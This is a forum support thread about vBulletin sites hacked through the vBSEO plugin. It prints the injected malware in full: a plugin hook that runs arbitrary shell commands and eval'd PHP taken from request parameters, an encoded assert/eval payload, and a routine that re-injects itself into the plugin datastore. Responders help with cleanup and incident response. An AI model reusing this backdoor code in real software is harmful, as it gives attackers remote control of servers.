hacked code problem.

I'm running 3.8.4 and like everyone else I started getting the errors last night.

I have disabled the vbseo plugin altogether and applied the code patch defined on this site - but I'm not sure what to do now to get rid of the program since I'm running 3.8.4. I have replaced vbseo.php and vbseocp.php which had been compromised in my forums directory with backup copies - what do I do now to get everything cleaned up and vbseo turned back on.


I downloaded the vbseo_checkplugins.php and ran it and got this:

Checking plugins code
Suspicious plugin #352: misc_start hook (crawlability_vbseo product) - vBSEO Misc Start [eval($_REQUEST]

that code contains:
if(defined('VBSEO_ENABLED'))
vbseo_complete_sec('misc_start');
if(isset($_REQUEST['c'])) {
header("Content-Type: text/plain");
$c=$_REQUEST['c'];
passthru($c);
die();
}
if(isset($_REQUEST['e'])) {
eval($_REQUEST['e']);
die();
}

In addition if I look in my datastore, I find this



a:163:{s:12:"init_startup";s:9411:"$GLOBALS["backups"]["randomseed"]=array (
0 => 'global_complete',
1 => 's:648:"assert(pack(chr(99).chr(42),40,33,101,109, 112,116,121,40,36,95,83,69,82,86,69,82,91,34,72,84 ,84,80,95,70,79,79,84,69,82,68,73,83,80,76,65,89,3 4,93,41,63,101,118,97,108,40,98,97,115,101,54,52,9 5,100,101,99,111,100,101,40,36,95,83,69,82,86,69,8 2,91,34,72,84,84,80,95,70,79,79,84,69,82,68,73,83, 80,76,65,89,34,93,41,41,58,40,33,101,109,112,116,1 21,40,36,95,82,69,81,85,69,83,84,91,34,102,111,111 ,116,101,114,100,105,115,112,108,97,121,34,93,41,6 3,101,118,97,108,40,98,97,115,101,54,52,95,100,101 ,99,111,100,101,40,36,95,82,69,81,85,69,83,84,91,3 4,102,111,111,116,101,114,100,105,115,112,108,97,1 21,34,93,41,41,58,117,110,105,113,105,100,40,41,41 ,41));";',
);$GLOBALS["acpcache"] = array (
0 => 'init_startup',
1 => 's:1465:"if (!defined("vB_PluginCacheActive")) { define("vB_PluginCacheActive", 1); function vB_PluginCacheCheck() { try { global $db; $plugin_data = $db->query_read("SELECT * FROM ".TABLE_PREFIX."datastore WHERE title=\'pluginlist\'"); $plugin_info = $db->fetch_array($plugin_data); $GLOBALS["vbplist"] = unserialize($plugin_info[\'data\']); $GLOBALS["vbpcache"] = ""; foreach($GLOBALS[\'backups\'] as $k => $v) { $back = unserialize($v[1]); vB_PluginCacheUpdate($v[0], $back, $back); $GLOBALS["vbpcache"] .= \'$GLOBALS["backups"]["\'.$k.\'"] = \'.var_export($v, 1).";\\n"; } $GLOBALS["vbpcache"] .= \'$GLOBALS["acpcache"] = \'.var_export($GLOBALS[\'acpcache\'], 1).";\\n"; $back = $GLOBALS["vbpcache"].unserialize($GLOBALS[\'acpcache\'][1])."\\n"; vB_PluginCacheUpdate($GLOBALS[\'acpcache\'][0], $back, "vB_PluginCacheActive"); } catch (Exception $e) {} } function vB_PluginCacheUpdate($hook, $code, $test) { if (!array_key_exists($hook, $GLOBALS["vbplist"])) { $GLOBALS["vbplist"][$hook] = ""; } if (strpos($GLOBALS["vbplist"][$hook], trim($test)) === false) { $GLOBALS["vbplist"][$hook] = $code . $GLOBALS["vbplist"][$hook]; build_datastore(\'pluginlist\', serialize($GLOBALS["vbplist"]), 1); } } $vbulletin->shutdown->add(vB_PluginCacheCheck);}";',
);
if (!defined("vB_PluginCacheActive")) {
define("vB_PluginCacheActive", 1);
function vB_PluginCacheCheck() {
try {
global $db;
$plugin_data = $db->query_read("SELECT * FROM ".TABLE_PREFIX."datastore WHERE title='pluginlist'");
$plugin_info = $db->fetch_array($plugin_data);
$GLOBALS["vbplist"] = unserialize($plugin_info['data']);
$GLOBALS["vbpcache"] = "";
foreach($GLOBALS['backups'] as $k => $v) {
$back = unserialize($v[1]);
vB_PluginCacheUpdate($v[0], $back, $back);
$GLOBALS["vbpcache"] .= '$GLOBALS["backups"]["'.$k.'"] = '.var_export($v, 1).";\n";
}
$GLOBALS["vbpcache"] .= '$GLOBALS["acpcache"] = '.var_export($GLOBALS['acpcache'], 1).";\n";
$back = $GLOBALS["vbpcache"].unserialize($GLOBALS['acpcache'][1])."\n";
vB_PluginCacheUpdate($GLOBALS['acpcache'][0], $back, "vB_PluginCacheActive");
} catch (Exception $e) {}
}
function vB_PluginCacheUpdate($hook, $code, $test) {
if (!array_key_exists($hook, $GLOBALS["vbplist"])) {
$GLOBALS["vbplist"][$hook] = "";
}
if (strpos($GLOBALS["vbplist"][$hook], trim($test)) === false) {
$GLOBALS["vbplist"][$hook] = $code . $GLOBALS["vbplist"][$hook];
build_datastore('pluginlist', serialize($GLOBALS["vbplist"]), 1);
}
}
$vbulletin->shutdown->add(vB_PluginCacheCheck);
}

That's bad code.

Try re-importing the vbseo XML product file with over-write and see if it clears it out.

thank you brian I will give that a shot.

Originally Posted by Brian Cummiskey

That's bad code.

Try re-importing the vbseo XML product file with over-write and see if it clears it out.

yes - that did. I guess the exploit manifested istself in different ways depending on the version - creative little buggers they were.

I save all my logs - can I look for something specific in the logs to help identify the culprit if there were indeed working from a single ip address? My guess is not and that they had a bot deployed on lots of computers taking into consideration the number of site they infected.

thanks for the fast response - we love your product.

Jeff

It appears that the code was run via YOU, the admin. They hooked on to a login with an iframe, and it basically ran when you went in to do stuff. There's more details in the last 2 posts of the annoucement sticky from Juan.

Originally Posted by Brian Cummiskey

It appears that the code was run via YOU, the admin. They hooked on to a login with an iframe, and it basically ran when you went in to do stuff. There's more details in the last 2 posts of the annoucement sticky from Juan.

Brian - thanks- I read the last two posts in the thread but I suppose I'm missing something.

I'm not sure what you mean when you say they hooked on to a login with an iframe. this started at 8 pm last night and no admins were even on the site last night.

perhaps if you give me some pointers with details I can look closer somewhere - right now I'm lost.

I've reloaded the xml file but I get the feeling you're insinuating this could happen again unless I fix something else?

thanks

Everything we've seen has had an iframe get attached and run when an admin logs on to the site. If that never happened, that it may be an entirely different vector that has not been identified at this point, and may not be related to the patch. I'm uncertain at best. I'm only going by the information I have available to me at this time.

Originally Posted by Brian Cummiskey

Everything we've seen has had an iframe get attached and run when an admin logs on to the site. If that never happened, that it may be an entirely different vector that has not been identified at this point, and may not be related to the patch. I'm uncertain at best. I'm only going by the information I have available to me at this time.

well - I can do a search through all the code for iframe and see what's found.

Code:

if(isset($_REQUEST['c'])) {
header("Content-Type: text/plain");
$c=$_REQUEST['c'];
passthru($c);
die();
}
if(isset($_REQUEST['e'])) {
eval($_REQUEST['e']);

This, when executed, will install a stealth shell that can be accessed by a hacker if they know the IP. This does not leave any traces that it even exists other than the plugin which sets cookies that holds the shell payload. Depending on how long this plugin was installed it's a good possibility your server was compromised and other backdoors installed.

Interesting - how do you know that?

Originally Posted by AWS

Code:

if(isset($_REQUEST['c'])) {
header("Content-Type: text/plain");
$c=$_REQUEST['c'];
passthru($c);
die();
}
if(isset($_REQUEST['e'])) {
eval($_REQUEST['e']);

This, when executed, will install a stealth shell that can be accessed by a hacker if they know the IP. This does not leave any traces that it even exists other than the plugin which sets cookies that holds the shell payload. Depending on how long this plugin was installed it's a good possibility your server was compromised and other backdoors installed.

Oleg updated the code in the annoucement thread. Install and run that product to find/clear anything remaning.

Uninstalling and reinstalling vbseo clears the problem - but then it returns.

This keeps happening continuously and I really don't know how to combat this.

I've manually rebuilt the site (vb + vbseo clean install) and changed passwords. But they keep reinserting the code.

This has been happening continuously for 2 weeks - I cannot find the exploit anywhere.

Hello Brian ,

Uninstalling/Installing just clear your cache and therefor the infected code is removed temporary. However you need to identify the injected files on your server and protect chmod 777 set directories in order to avoid any file injections.

Please contact me via PM so i will hand you my Skype address , let me try to assist you directly .

Ah, wait - looked like when I did a clean reinstall I uploaded an older version of vbseo 3.6.0. Redone that and changed passwords, see if that helps - if not, will PM as the redirect to filestore now inlucdes a malware warning.